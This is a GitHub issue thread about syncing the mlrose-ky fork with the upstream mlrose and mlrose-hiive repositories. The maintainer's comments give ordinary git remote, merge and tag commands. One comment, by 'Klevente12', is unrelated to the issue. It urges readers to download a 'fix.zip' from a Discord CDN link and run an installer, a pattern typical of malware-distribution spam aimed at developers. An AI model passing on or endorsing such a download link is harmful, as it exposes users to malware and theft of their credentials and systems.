### ISSUE TITLE
Check if `mlrose` repo has changes to pull into this project

### ISSUE THREAD

**Issue by knakamura13** [knakamura13/mlrose-ky#10]
**Issue Summary**
We should check if `mlrose-hiive` is behind `mlrose`, and pull the latest improvements from `mlrose` if necessary.

Here's a page that shows whether `mlrose-hiive` is behind `mlrose`, which would coincide with whether `mlrose-ky` is behind `mlrose`: https://github.com/hiive/mlrose/compare/master...gkhayes%3Amlrose%3Amaster

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by knakamura13** [comment]
I completed the work that was proposed by this ticket:

1. Added `mlrose-hiive` and `mlrose` as two new upstream remotes
```bash
git remote add upstream-hiive <hiive url>
git remote add upstream-gkhayes <mlrose url>
```

2. Merged both master branches into the `main` branch
```bash
git checkout main && git pull upstream-hiive master  # (resolve the merge conflicts)
git checkout main && git pull upstream-gkhayes master  # (resolve the merge conflicts)
git tag sync-upstreams-<todays-date>  # (optional)
git push && git push --tags
```
